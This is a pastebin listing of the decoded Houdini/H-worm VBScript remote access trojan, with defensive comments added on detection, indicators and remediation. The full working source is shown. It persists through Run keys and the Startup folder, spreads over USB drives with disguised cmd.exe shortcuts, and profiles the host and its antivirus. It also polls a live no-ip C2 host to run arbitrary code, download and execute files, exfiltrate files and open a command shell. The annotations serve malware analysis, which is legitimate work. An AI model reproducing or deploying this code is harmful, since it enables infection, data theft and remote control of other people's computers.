cephurs

houdini-fx decoded java.vbs

Apr 7th, 2016
  1. 'from java.vbs c8a01799758c210f73a5765f9498f121 boube
  2. '<[ recoder : houdini (c) skype : houdini-fx ]>
  3.  
  4. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5.  
  ' Sample configuration. host and port form the C2 endpoint: post, download and
  ' upload below all build "http://" & host & ":" & port & "/..." from these two
  ' values, so both are network indicators for this sample.
  6. host = "mysarab.no-ip.biz"
  7. port = 630
  ' Expanded with expandenvironmentstrings in the private-var section below.
  8. installdir = "%temp%"
  ' lnkfile / lnkfolder gate the two shortcut-creation loops in sub install.
  9. lnkfile = true
  10. lnkfolder = true
  11.  
  12. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  13.  
  ' Script-wide COM objects: WScript.Shell (registry, shortcuts, process launch),
  ' Scripting.FileSystemObject (file and drive access) and MSXML2.XMLHTTP (the
  ' HTTP client used by function post).
  14. dim shellobj
  15. set shellobj = wscript.createobject("wscript.shell")
  16. dim filesystemobj
  17. set filesystemobj = createobject("scripting.filesystemobject")
  18. dim httpobj
  19. set httpobj = createobject("msxml2.xmlhttp")
  20.  
  21.  
  22. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  23.  
  ' Derived globals. installname is the running script's own file name, so the
  ' file name and the registry value names built from it vary per dropped copy.
  24. installname = wscript.scriptname
  ' Per-user Startup folder, used as a second persistence location by upstart.
  25. startup = shellobj.specialfolders ("startup") & "\"
  26. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  ' Falls back to %temp% when the configured install directory does not exist.
  27. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  ' Field delimiter "<|>" used in C2 replies, in the header built by information
  ' and in request paths; a usable string to match on in proxy or HTTP logs.
  28. spliter = "<" & "|" & ">"
  ' Poll interval handed to wscript.sleep (milliseconds) at the end of each loop pass.
  29. sleep = 5000
  30. dim response
  31. dim cmd
  32. dim param
  33. info = ""
  34. usbspreading = ""
  35. startdate = ""
  ' Holds the text-stream handle that function instance opens on the installed copy.
  36. dim oneonce
  37.  
  38. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  39. on error resume next
  ' Main beacon loop. Runtime errors are suppressed by the line above, so a failed
  ' request or an empty reply simply falls through to the sleep at the bottom.
  ' Flow: instance runs once, then each pass calls install (re-applying persistence
  ' and the removable-drive copies), POSTs "is-ready" to the C2, splits the reply
  ' on spliter and dispatches on the first field.
  ' Detection: a wscript.exe process issuing a recurring POST to /is-ready on the
  ' configured host and port.
  40.  
  41.  
  42. instance
  43. while true
  44.  
  45. install
  46.  
  47. response = ""
  48. response = post ("is-ready","")
  49. cmd = split (response,spliter)
  50. select case cmd (0)
  ' "excecute" (spelled this way in the sample): the second field is passed to
  ' VBScript execute, i.e. the server can run arbitrary script text in-process.
  51. case "excecute"
  52.       param = cmd (1)
  53.       execute param
  ' "update": the installed script is overwritten (mode 2 = ForWriting) with the
  ' server-supplied text, relaunched hidden with wscript.exe //B, and this copy exits.
  54. case "update"
  55.       param = cmd (1)
  56.       oneonce.close
  57.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  58.       oneonce.write param
  59.       oneonce.close
  60.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  61.       wscript.quit
  62. case "uninstall"
  63.       uninstall
  ' "send" fetches a file from the C2, "site-send" from a URL named in the reply;
  ' both helpers write the file to disk and then run it.
  64. case "send"
  65.       download cmd (1),cmd (2)
  66. case "site-send"
  67.       sitedownloader cmd (1),cmd (2)
  ' "recv": the named local file is read and sent to the C2 (data leaves the host).
  68. case "recv"
  69.       param = cmd (1)
  70.       upload (param)
  ' The enum-* and cmd-shell commands post their results back to the C2.
  71. case  "enum-driver"
  72.       post "is-enum-driver",enumdriver  
  73. case  "enum-faf"
  74.       param = cmd (1)
  75.       post "is-enum-faf",enumfaf (param)
  76. case  "enum-process"
  77.       post "is-enum-process",enumprocess  
  78. case  "cmd-shell"
  79.       param = cmd (1)
  80.       post "is-cmd-shell",cmdshell (param)  
  81. case  "delete"
  82.       param = cmd (1)
  83.       deletefaf (param)
  84. case  "exit-process"
  85.       param = cmd (1)
  86.       exitprocess (param)
  ' "sleep": the new poll interval is produced by eval on the server-supplied text.
  87. case  "sleep"
  88.       param = cmd (1)
  89.       sleep = eval (param)        
  90. end select
  91.  
  92. wscript.sleep sleep
  93.  
  94. wend
  95.  
  96.  
  97. sub install
  ' Re-applies persistence (upstart) and then handles every ready drive that has
  ' free space and drivetype = 1 (removable in the FileSystemObject model):
  '   - copies the script to the drive root and marks it hidden + system (2+4);
  '   - for each root file that is not a .lnk: marks it hidden + system and creates
  '     a same-named .lnk whose target is cmd.exe and whose arguments start the
  '     script first and then the original file;
  '   - does the same for each root folder, opening it with explorer.
  ' Icons are read from the registry (the extension's defaulticon, or the folder
  ' defaulticon) so the shortcut looks like the item it replaces.
  ' Detection / triage: .lnk files in a removable drive's root with target cmd.exe
  ' and "/c start" arguments, next to hidden+system originals of the same name.
  98. on error resume next
  99. dim lnkobj
  100. dim filename
  101. dim foldername
  102. dim fileicon
  103. dim foldericon
  104.  
  105. upstart
  106. for each drive in filesystemobj.drives
  107.  
  108. if  drive.isready = true then
  109. if  drive.freespace  > 0 then
  110. if  drive.drivetype  = 1 then
  111.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  112.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  113.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  114.     end if
  115.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  116.         if not lnkfile then exit for
  117.         if  instr (file.name,".") then
  ' Existing shortcuts are skipped; every other file with an extension is hidden.
  118.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  119.                 file.attributes = 2+4
  120.                 if  ucase (file.name) <> ucase (installname) then
  121.                     filename = split(file.name,".")
  122.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  ' windowstyle 7 starts the target minimized.
  123.                     lnkobj.windowstyle = 7
  124.                     lnkobj.targetpath = "cmd.exe"
  125.                     lnkobj.workingdirectory = ""
  126.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  127.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  128.                     if  instr (fileicon,",") = 0 then
  129.                         lnkobj.iconlocation = file.path
  130.                     else
  131.                         lnkobj.iconlocation = fileicon
  132.                     end if
  133.                     lnkobj.save()
  134.                 end if
  135.             end if
  136.         end if
  137.     next
  138.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  139.         if not lnkfolder then exit for
  140.         folder.attributes = 2+4
  141.         foldername = folder.name
  142.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  143.         lnkobj.windowstyle = 7
  144.         lnkobj.targetpath = "cmd.exe"
  145.         lnkobj.workingdirectory = ""
  146.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  147.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  148.         if  instr (foldericon,",") = 0 then
  149.             lnkobj.iconlocation = folder.path
  150.         else
  151.             lnkobj.iconlocation = foldericon
  152.         end if
  153.         lnkobj.save()
  154.     next
  155. end If
  156. end If
  157. end if
  158. next
  159. err.clear
  160. end sub
  161.  
  162. sub uninstall
  ' Self-removal, triggered by the "uninstall" command. Deletes both Run values,
  ' the Startup-folder copy and the running script file, then on each ready
  ' removable drive resets file and folder attributes to 0 (normal), deletes the
  ' script copy and deletes the .lnk files in the drive root, and finally quits.
  ' Remediation notes taken from what this routine does and does not touch:
  '   - every .lnk file in the drive root is deleted, not only those the script made;
  '   - the marker value that function instance writes under
  '     HKEY_LOCAL_MACHINE\software\<script base name>\ is not removed here, so it
  '     can remain as evidence after a remote uninstall.
  163. on error resume next
  164. dim filename
  165. dim foldername
  166.  
  167. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  168. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  169. filesystemobj.deletefile startup & installname ,true
  170. filesystemobj.deletefile wscript.scriptfullname ,true
  171.  
  172. for  each drive in filesystemobj.drives
  173. if  drive.isready = true then
  174. if  drive.freespace  > 0 then
  175. if  drive.drivetype  = 1 then
  176.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
  177.          on error resume next
  178.          if  instr (file.name,".") then
  179.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  ' Non-shortcut file: unhide it, then delete either its matching .lnk or, when the
  ' file is the script copy itself, the file.
  180.                  file.attributes = 0
  181.                  if  ucase (file.name) <> ucase (installname) then
  182.                      filename = split(file.name,".")
  183.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  184.                  else
  185.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  186.                  end If
  187.              else
  188.                  filesystemobj.deletefile (file.path)
  189.              end if
  190.          end if
  191.      next
  192.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  193.          folder.attributes = 0
  194.      next
  195. end if
  196. end if
  197. end if
  198. next
  199. wscript.quit
  200. end sub
  201.  
  202. function post (cmd ,param)
  ' Sends one synchronous HTTP POST to http://<host>:<port>/<cmd> with param as the
  ' body and returns the response text. The host fingerprint built by function
  ' information is sent in a request header (the header name is written
  ' "user-agent:" with a trailing colon in the sample).
  ' Detection: plain-HTTP POSTs whose path starts with "is-" and whose User-Agent
  ' carries "<|>"-separated host details instead of a browser string.
  203.  
  204. post = param
  205. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  206. httpobj.setrequestheader "user-agent:",information
  207. httpobj.send param
  208. post = httpobj.responsetext
  209. end function
  210.  
  211. function information
  ' Builds the host fingerprint sent with every request. Fields, joined by spliter,
  ' in order: hwid (volume serial number), %computername%, %username%, the OS
  ' caption from win32_operatingsystem, the literal "plus", the result of
  ' function security (antivirus product names) and the usbspreading marker.
  ' NOTE(review): the inf = "" test looks like a build-once cache; whether inf keeps
  ' its value between calls is not established by this listing - confirm.
  212. on error resume next
  213. if  inf = "" then
  214.     inf = hwid & spliter
  215.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  216.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  217.  
  218.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  219.     set os = root.execquery ("select * from win32_operatingsystem")
  220.     for each osinfo in os
  221.        inf = inf & osinfo.caption & spliter  
  222.        exit for
  223.     next
  224.     inf = inf & "plus" & spliter
  225.     inf = inf & security & spliter
  226.     inf = inf & usbspreading
  227.     information = inf  
  228. else
  229.     information = inf
  230. end if
  231. end function
  232.  
  233.  
  234. sub upstart ()
  ' Persistence. Writes a Run value named after the script's base name under both
  ' HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, with data
  '   wscript.exe //B "<installdir><installname>"
  ' and copies the running script into installdir and into the Startup folder.
  ' Errors are suppressed, so a write that fails (the HKLM one, for example) goes
  ' unreported. Called from instance and again on every pass of the main loop via
  ' install, so artefacts that are deleted while the process is alive are recreated.
  ' Detection: Run values whose data launches wscript.exe //B on a script under
  ' %temp%, and script files appearing in the Startup folder.
  235. on error resume Next
  236.  
  237. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  238. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  239. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  240. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  241.  
  242. end sub
  243.  
  244.  
  245. function hwid
  ' Returns the volume serial number of the first win32_logicaldisk entry that has
  ' a non-empty one; the value is the first field of the fingerprint built by
  ' function information.
  246. on error resume next
  247.  
  248. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  249. set disks = root.execquery ("select * from win32_logicaldisk")
  250. for each disk in disks
  251.     if  disk.volumeserialnumber <> "" then
  252.         hwid = disk.volumeserialnumber
  253.         exit for
  254.     end if
  255. next
  256. end function
  257.  
  258.  
  259. function security
  ' Reports installed antivirus products: reads the OS version through WMI, picks
  ' the root\securitycenter2 or root\securitycenter namespace from it, queries
  ' antivirusproduct and concatenates each displayname. Returns "nan-av" when
  ' nothing was collected. The result is part of the fingerprint sent to the C2.
  ' NOTE(review): every error in this function is suppressed, so which namespace is
  ' actually queried on a given host should be confirmed dynamically.
  260. on error resume next
  261.  
  262. security = ""
  263.  
  264. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  265. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  266. for each objitem in colitems
  267.     versionstr = split (objitem.version,".")
  268. next
  269. versionstr = split (colitems.version,".")
  270. osversion = versionstr (0) & "."
  271. for  x = 1 to ubound (versionstr)
  272.      osversion = osversion &  versionstr (i)
  273. next
  274. osversion = eval (osversion)
  275. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  276.  
  277. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  278. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  279.  
  280. for each objantivirus in colantivirus
  281.     security  = security  & objantivirus.displayname & " ."
  282. next
  283. if security  = "" then security  = "nan-av"
  284. end function
  285.  
  286.  
  287. function instance
  ' Start-up routine, run once before the main loop.
  ' 1. Reads the default value of HKEY_LOCAL_MACHINE\software\<script base name>\.
  '    If it is empty, writes "true - <date>" when the script is running from the
  '    root of a drive (path is <letter>:\<installname>) and "false - <date>"
  '    otherwise. Forensic value: when present, this registry value records the
  '    first-run date and whether the first run came from a drive root.
  ' 2. Calls upstart, then compares the short path of the running file with the
  '    installed copy; when they differ it launches the installed copy with
  '    wscript.exe //B and exits.
  ' 3. Opens the installed copy for appending (mode 8) and keeps the handle in the
  '    global oneonce, quitting if the open fails - presumably a single-instance
  '    lock; confirm dynamically.
  288. on error resume next
  289.  
  290. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  291. if usbspreading = "" then
  292.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  293.       usbspreading = "true - " & date
  294.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  295.    else
  296.       usbspreading = "false - " & date
  297.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  298.  
  299.    end if
  300. end If
  301.  
  302.  
  303.  
  304. upstart
  305. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  306. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  307. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  308.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  309.     wscript.quit
  310. end If
  311. err.clear
  312. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  313. if  err.number > 0 then wscript.quit
  314. end function
  315.  
  316.  
  317. sub sitedownloader (fileurl,filename)
  ' Handler for "site-send": issues a GET for the URL supplied in the C2 reply,
  ' deletes any existing file at installdir & filename, writes the response body
  ' there as binary (adodb.stream type 1) when the status is 200, and then runs
  ' the saved file through shellobj.run.
  ' Detection: wscript.exe writing a new file under the install directory and
  ' starting it straight away; the download URL need not be the configured C2 host.
  318.  
  319. strlink = fileurl
  320. strsaveto = installdir & filename
  321. set objhttpdownload = createobject("msxml2.xmlhttp" )
  322. objhttpdownload.open "get", strlink, false
  323. objhttpdownload.send
  324.  
  325. set objfsodownload = createobject ("scripting.filesystemobject")
  326. if  objfsodownload.fileexists (strsaveto) then
  327.     objfsodownload.deletefile (strsaveto)
  328. end if
  329.  
  330. if objhttpdownload.status = 200 then
  331.    dim  objstreamdownload
  332.    set  objstreamdownload = createobject("adodb.stream")
  333.    with objstreamdownload
  334.         .type = 1
  335.         .open
  336.         .write objhttpdownload.responsebody
  337.         .savetofile strsaveto
  338.         .close
  339.    end with
  340.    set objstreamdownload = nothing
  341. end if
  342. if objfsodownload.fileexists(strsaveto) then
  343.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  344. end if
  345. end sub
  346.  
  347. sub download (fileurl,filedir)
  ' Handler for "send": requests a file from the C2 itself by POSTing to
  ' /is-sending<|><fileurl>, saves the response body under filedir (installdir
  ' when filedir is empty) using the part of fileurl after its last backslash as
  ' the file name, and then runs the saved file.
  ' Detection: POST requests whose path contains "is-sending" followed by "<|>"
  ' and a Windows-style path.
  348.  
  349. if filedir = "" then
  350.    filedir = installdir
  351. end if
  352.  
  353. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  354. set objhttpdownload = createobject("msxml2.xmlhttp")
  355. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  356. objhttpdownload.send ""
  357.      
  358. set objfsodownload = createobject ("scripting.filesystemobject")
  359. if  objfsodownload.fileexists (strsaveto) then
  360.     objfsodownload.deletefile (strsaveto)
  361. end if
  362. if  objhttpdownload.status = 200 then
  363.     dim  objstreamdownload
  364.     set  objstreamdownload = createobject("adodb.stream")
  365.     with objstreamdownload
  366.          .type = 1
  367.          .open
  368.          .write objhttpdownload.responsebody
  369.          .savetofile strsaveto
  370.          .close
  371.     end with
  372.     set objstreamdownload  = nothing
  373. end if
  374. if objfsodownload.fileexists(strsaveto) then
  375.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  376. end if
  377. end sub
  378.  
  379.  
  380. function upload (fileurl)
  ' Handler for "recv": reads the local file named by fileurl as binary and POSTs
  ' its contents to /is-recving<|><fileurl> on the C2. This is the sample's file
  ' exfiltration path; the local path appears in the request URL, which makes the
  ' transferred file identifiable from proxy logs.
  ' A local httpobj is declared here, so the script-wide one is not used and no
  ' fingerprint header is set on this request.
  381.  
  382. dim  httpobj,objstreamuploade,buffer
  383. set  objstreamuploade = createobject("adodb.stream")
  384. with objstreamuploade
  385.      .type = 1
  386.      .open
  387.      .loadfromfile fileurl
  388.      buffer = .read
  389.      .close
  390. end with
  391. set objstreamdownload = nothing
  392. set httpobj = createobject("msxml2.xmlhttp")
  393. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  394. httpobj.send buffer
  395. end function
  396.  
  397.  
  398. function enumdriver ()
  ' Lists every ready drive as "<path>|<drivetype>" entries joined by spliter; the
  ' main loop posts the result to the C2 as "is-enum-driver".
  399.  
  400. for  each drive in filesystemobj.drives
  401. if   drive.isready = true then
  402.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  403. end if
  404. next
  405. end Function
  406.  
  407. function enumfaf (enumdir)
  ' Directory listing for the C2. The result starts with enumdir, followed by one
  ' entry per subfolder ("<name>||d|<attributes>") and one per file
  ' ("<name>|<size>|f|<attributes>"), each terminated by spliter.
  408.  
  409. enumfaf = enumdir & spliter
  410. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  411.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  412. next
  413.  
  414. for  each file in filesystemobj.getfolder (enumdir).files
  415.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  416.  
  417. next
  418. end function
  419.  
  420.  
  421. function enumprocess ()
  ' Process listing for the C2: queries win32_process through WMI and returns
  ' "<name>|<pid>|<executable path>" entries joined by spliter.
  422.  
  423. on error resume next
  424.  
  425. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  426. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  427.  
  428. dim objitem
  429. for each objitem in colitems
  430.     enumprocess = enumprocess & objitem.name & "|"
  431.     enumprocess = enumprocess & objitem.processid & "|"
  432.     enumprocess = enumprocess & objitem.executablepath & spliter
  433. next
  434. end function
  435.  
  436. sub exitprocess (pid)
  ' Handler for "exit-process": runs taskkill /F /T /PID with the server-supplied
  ' value, minimized (7) and waiting for completion (true).
  ' Detection: taskkill.exe started with wscript.exe as its parent process.
  437. on error resume next
  438.  
  439. shellobj.run "taskkill /F /T /PID " & pid,7,true
  440. end sub
  441.  
  442. sub deletefaf (url)
  ' Handler for "delete": tries the server-supplied path first as a file and then
  ' as a folder; errors are suppressed, so whichever call does not apply fails
  ' silently.
  443. on error resume next
  444.  
  445. filesystemobj.deletefile url
  446. filesystemobj.deletefolder url
  447.  
  448. end sub
  449.  
  450. function cmdshell (cmd)
  ' Handler for "cmd-shell": runs the server-supplied text through
  ' %comspec% /c and returns the captured stdout, or stderr when stdout is already
  ' at end of stream, or "" when both are; the main loop posts the result to the C2
  ' as "is-cmd-shell".
  ' Detection: wscript.exe spawning cmd.exe /c, followed by a POST to /is-cmd-shell.
  451.  
  452. dim httpobj,oexec,readallfromany
  453.  
  454. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  455. if not oexec.stdout.atendofstream then
  456.    readallfromany = oexec.stdout.readall
  457. elseif not oexec.stderr.atendofstream then
  458.    readallfromany = oexec.stderr.readall
  459. else
  460.    readallfromany = ""
  461. end if
  462.  
  463. cmdshell = readallfromany
  464. end function